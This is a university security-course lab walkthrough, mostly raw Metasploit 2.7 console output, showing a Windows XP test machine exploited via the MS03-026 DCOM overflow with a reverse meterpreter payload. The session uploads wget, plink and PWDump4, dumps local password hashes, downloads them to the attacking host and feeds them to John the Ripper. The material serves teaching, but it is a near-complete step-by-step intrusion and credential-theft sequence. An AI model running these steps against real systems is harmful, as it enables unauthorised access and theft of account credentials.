University of Colorado Colorado Springs

Exploit XPUP using Msfconsole of framework 2 with meterpreter

Here we run msfconsole on viva and testing an xpup machine.

First login viva and edit your .bash_profile to include the path to framework-2.7.

You can also use framework-3.0 if you are familiar with it. They have different ways to organize the exploits and payload. Framework-3.0 is more organized.

Here is the line of PATH in .bash_profile I modified.


[cs591@viva ~]$ msfconsole

Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)


< metasploit >


\ ,__,

\ (oo)____

(__) )\

||--|| *

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > show exploits

Metasploit Framework Loaded Exploits


3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow

Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Overflow

aim_goaway AOL Instant Messenger goaway Overflow

altn_webadmin Alt-N WebAdmin USER Buffer Overflow

apache_chunked_win32 Apache Win32 Chunked Encoding

arkeia_agent_access Arkeia Backup Client Remote Access

arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)

arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)

awstats_configdir_exec AWStats configdir Remote Command Execution

backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow

backupexec_dump Veritas Backup Exec Windows Remote File Access

backupexec_ns Veritas Backup Exec Name Service Overflow

backupexec_registry Veritas Backup Exec Server Registry Access

badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow

bakbone_netvault_heap BakBone NetVault Remote Heap Overflow

barracuda_img_exec Barracuda IMG.PL Remote Command Execution

blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow

bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow

bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow

cabrightstor_disco CA BrightStor Discovery Service Overflow

cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow

cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow

cabrightstor_uniagent CA BrightStor Universal Agent Overflow

cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)

cacti_graphimage_exec Cacti graph_image.php Remote Command Execution

calicclnt_getconfig CA License Client GETCONFIG Overflow

calicserv_getconfig CA License Server GETCONFIG Overflow

cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow

distcc_exec DistCC Daemon Command Execution

edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow

edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow

eiq_license EIQ License Manager Overflow

eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow

exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow

firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)

firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X)

freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow

freeftpd_user freeFTPd USER Overflow

freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow

futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow

globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow

gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability

google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution

hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing

hpux_lpd_exec HP-UX LPD Command Execution

ia_webmail IA WebMail 3.x Buffer Overflow

icecast_header Icecast (compareTo() Code Execution

ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow

ms05_039_pnp Microsoft PnP MS05-039 Overflow

msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow

msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017

msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026

mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow

mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow

netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow

netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow

niprint_lpd NIPrint LPD Request Overflow

novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow

openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution

openview_omniback HP OpenView Omniback II Command Execution

oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)

oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)

oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)

pajax_remote_exec PAJAX Remote Command Execution

payload_handler Metasploit Framework Payload Handler

peercast_url_linux PeerCast 135

msf msrpc_dcom_ms03_026 > set LHOST


msf msrpc_dcom_ms03_026 > set LPORT 4321

LPORT -> 4321

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads


win32_adduser Windows Execute net user /ADD

win32_bind Windows Bind Shell

win32_bind_dllinject Windows Bind DLL Inject

win32_bind_meterpreter Windows Bind Meterpreter DLL Inject

win32_bind_stg Windows Staged Bind Shell

win32_bind_stg_upexec Windows Staged Bind Upload/Execute

win32_bind_vncinject Windows Bind VNC Server DLL Inject

win32_downloadexec Windows Executable Download and Execute

win32_exec Windows Execute Command

win32_passivex Windows PassiveX ActiveX Injection Payload

win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload

win32_passivex_stg Windows Staged PassiveX Shell

win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload

win32_reverse Windows Reverse Shell

win32_reverse_dllinject Windows Reverse DLL Inject

win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject

win32_reverse_ord Windows Staged Reverse Ordinal Shell

win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject

win32_reverse_stg Windows Staged Reverse Shell

win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute

win32_reverse_vncinject Windows Reverse VNC Server Inject

msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter


msf msrpc_dcom_ms03_026 > set TARGET 2


msf msrpc_dcom_ms03_026 > exploit

[*] This exploit requires a valid payload to be specified first.

msf msrpc_dcom_ms03_026 > set payload win32_reverse_meterpreter

payload -> win32_reverse_meterpreter

[*] WARNING: the correct case of the 'payload' variable is 'PAYLOAD'

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Invalid target specified.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set PAYLOAD win32_reverse_meterpreter

PAYLOAD -> win32_reverse_meterpreter

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Invalid target specified.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0


msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Got connection from

[*] Sending Intermediate Stager (89 bytes)

[*] Sending Stage (2834 bytes)

[*] Sleeping before sending dll.

[*] Uploading dll to memory (69643), Please wait...

[*] Upload completed


[ -= connected to =- ]

[ -= meterpreter server =- ]

[ -= v. 00000500 =- ]

meterpreter> ls

invalid command

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

meterpreter> use -m Process

loadlib: Loading library from 'ext472627.dll' on the remote machine.


loadlib: success.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

meterpreter> use -m Fs

loadlib: Loading library from 'ext500104.dll' on the remote machine.


loadlib: success.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> upload wget.exe

Usage: upload src1 [src2 ...] dst

meterpreter> upload wget.exe c:\

upload: Starting upload of 'wget.exe' to 'c:\\wget.exe'...

upload: 1 uploads started.


upload: Upload from 'wget.exe' succeeded.

meterpreter> upload plink.exe

Usage: upload src1 [src2 ...] dst

meterpreter> upload plink.exe c:\

upload: Starting upload of 'plink.exe' to 'c:\\plink.exe'...

upload: 1 uploads started.


upload: Upload from 'plink.exe' succeeded.

meterpreter> execute -f wget.exe -a

execute: Executing 'wget.exe'...


execute: failure, 2.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> execute -f c:\wget.exe -a

execute: Executing 'c:\wget.exe'...


execute: success, process id is 188.

meterpreter> execute -f c:\wget.exe -a

execute: Executing 'c:\wget.exe'...


execute: success, process id is 224.

meterpreter> execute -f c:\tftpd32.exe

execute: Executing 'c:\tftpd32.exe'...


execute: failure, 2.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...


execute: success, process id is 2020.

execute: allocated channel 3 for new process.

meterpreter> interact 3

interact: Switching to interactive console on 3...


interact: Started interactive channel 3.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..

cd ..

C:\WINDOWS>cd ..

cd ..



'ls' is not recognized as an internal or external command,

operable program or batch file.



Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 10:58 PM 308,736 wget.exe

01/06/2007 11:27 PM WINDOWS

4 File(s) 538,112 bytes

4 Dir(s) 15,457,402,880 bytes free

C:\>plink.exe -ssh

plink.exe -ssh

The server's host key is not cached in the registry. You

have no guarantee that the server is the computer you

think it is.

The server's key fingerprint is:

ssh-rsa 2048 a8:e4:d7:d4:e7:61:dd:02:26:e6:c1:b5:f9:12:2b:83

If you trust this host, enter "y" to add the key to

PuTTY's cache and carry on connecting.

If you want to carry on connecting just once, without

adding the key to the cache, enter "n".

If you do not trust this host, press Return to abandon the


Store key in cache? (y/n) y's password: XXXXXX's password: XXXXXX's password: Caught interrupt, close interactive session? [y/N] y

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...


execute: success, process id is 356.

execute: allocated channel 4 for new process.

meterpreter> interact 4

interact: Switching to interactive console on 4...


interact: Started interactive channel 4.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..

cd ..

C:\WINDOWS>cd ..

cd ..



'ls' is not recognized as an internal or external command,

operable program or batch file.



Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

4 File(s) 538,112 bytes

4 Dir(s) 15,457,370,112 bytes free

C:\>plink -l cs591 -pw XXXXXX

plink -l cs591 -pw XXXXX

Last login: Wed May 9 00:15:10 2007 from c-75-70-32-124.hsd1.

[cs591@viva ~]$ ls


bin CS591S2007Grade.txt out vmware

bufferOverflow Desktop public_html

cs591ClientFromViva.p12 framework-2.7-snapshot.tar.gz secure

[cs591@viva ~]$ exit



Using username "cs591".

C:\>plink -ssh scp

plink -ssh scp

Unable to open connection:

Host does not exist


meterpreter> upload ../passwd-attack/PWDump4.exe c:\

upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...

upload: 1 uploads started.


upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.

meterpreter> upload ../passwd-attack/PWDupm4.dll c:\

upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...

upload: 1 uploads started.


Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.

meterpreter> upload ../passwd-attack/PWDump4.dll c:\

upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...

upload: 1 uploads started.


upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> upload ../passwd-attack/PWDump4.exe c:\

upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...

upload: 1 uploads started.


upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.

meterpreter> upload ../passwd-attack/PWDupm4.dll c:\

upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...

upload: 1 uploads started.


Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.

meterpreter> upload ../passwd-attack/PWDump4.dll c:\

upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...

upload: 1 uploads started.


upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...


meterpreter> execute -f cmd -c

execute: Executing 'cmd'...



meterpreter> show

invalid command

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...


meterpreter> exit


The meterpreter is shutting down...

[*] Meterpreter client finished.

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > quit

[cs591@viva tools]$ msfconsole

Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)

_ _ _ _

| | | | (_) |

_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_

| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|

| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_

|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|

| |


+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > set msrpc_dcom_ms03_026

msfconsole: set: command not found

msf > use msrpc_dcom_ms03_026

msf msrpc_dcom_ms03_026 > set RHOST


msf msrpc_dcom_ms03_026 > set RPORT 135

RPORT -> 135

msf msrpc_dcom_ms03_026 > set LHOST


msf msrpc_dcom_ms03_026 > set LPORT 4321

LPORT -> 4321

msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter


msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse_meterpreter

PAYLOAD -> win32_reverse_meterpreter

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0


msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Got connection from

[*] Sending Intermediate Stager (89 bytes)

[*] Sending Stage (2834 bytes)

[*] Sleeping before sending dll.

[*] Uploading dll to memory (69643), Please wait...

[*] Upload completed


[ -= connected to =- ]

[ -= meterpreter server =- ]

[ -= v. 00000500 =- ]

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

meterpreter> use -m Process

loadlib: Loading library from 'ext285386.dll' on the remote machine.


loadlib: success.

meterpreter> use -m Fs

loadlib: Loading library from 'ext821455.dll' on the remote machine.


loadlib: success.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...


execute: success, process id is 320.

execute: allocated channel 1 for new process.

meterpreter> interact 1

interact: Switching to interactive console on 1...


interact: Started interactive channel 1.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..

cd ..

C:\WINDOWS>cd ..

cd ..



'ls' is not recognized as an internal or external command,

operable program or batch file.



Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 11:20 PM 0 PWDupm4.dll

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

7 File(s) 559,104 bytes

4 Dir(s) 15,457,337,344 bytes free

C:\>delete PWDupm4.dll

delete PWDupm4.dll

'delete' is not recognized as an internal or external command,

operable program or batch file.

C:\>del PWDupm4.dll

del PWDupm4.dll



Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

6 File(s) 559,104 bytes

4 Dir(s) 15,457,337,344 bytes free



PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.


This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]

[Target] -- Target Computer's ip or name to work,

[/l] -- works on local Computer.

[/s:share] -- Share used to copy files instead of Admin$.

[/o:outputFile] -- Result filename for output.

[/u:userName] -- UserName used to connect, provide password later.

[/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more.

C:\>PWDump4 /l /o:passwd.txt

PWDump4 /l /o:passwd.txt

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.


This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

SRV>Version: OS Ver 5.1, , Workstation



Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 11:34 PM 88 passwd.txt

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

7 File(s) 559,192 bytes

4 Dir(s) 15,457,329,152 bytes free

C:\>vi passwd.txt

vi passwd.txt

'vi' is not recognized as an internal or external command,

operable program or batch file.

C:\>cat passwd.txt

cat passwd.txt

'cat' is not recognized as an internal or external command,

operable program or batch file.

C:\>more passwd.txt

more passwd.txt




PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.


This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]

[Target] -- Target Computer's ip or name to work,

[/l] -- works on local Computer.

[/s:share] -- Share used to copy files instead of Admin$.

[/o:outputFile] -- Result filename for output.

[/u:userName] -- UserName used to connect, provide password later.

[/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more.

C:\>PWDump4 /l /o:pw.txt

PWDump4 /l /o:pw.txt

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.


This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

SRV>Version: OS Ver 5.1, , Workstation



Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 11:34 PM 88 passwd.txt

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:42 PM 169 pw.txt

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

8 File(s) 559,361 bytes

4 Dir(s) 15,456,821,248 bytes free




interact: Ending interactive session.

meterpreter> download c:\pw.txt /pentest

download: Starting download from 'c:\pw.txt' to '/pentest/pw.txt'...

download: 1 downloads started.


download: Download to '/pentest/pw.txt' succeeded.

meterpreter> download c:\passwd.txt /pentest

download: Starting download from 'c:\passwd.txt' to '/pentest/passwd.txt'...

download: 1 downloads started.


download: Download to '/pentest/passwd.txt' succeeded.

meterpreter> quit

[cs591@viva pentest]$ password/john-1.7.2/run/john pw.txt

password/john-1.7.2/run/john: error while loading shared libraries: cannot open shared object file: No such file or directory

[cs591@viva pentest]$ john pw.txt

Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])


In order to avoid copyright disputes, this page is only a partial summary.

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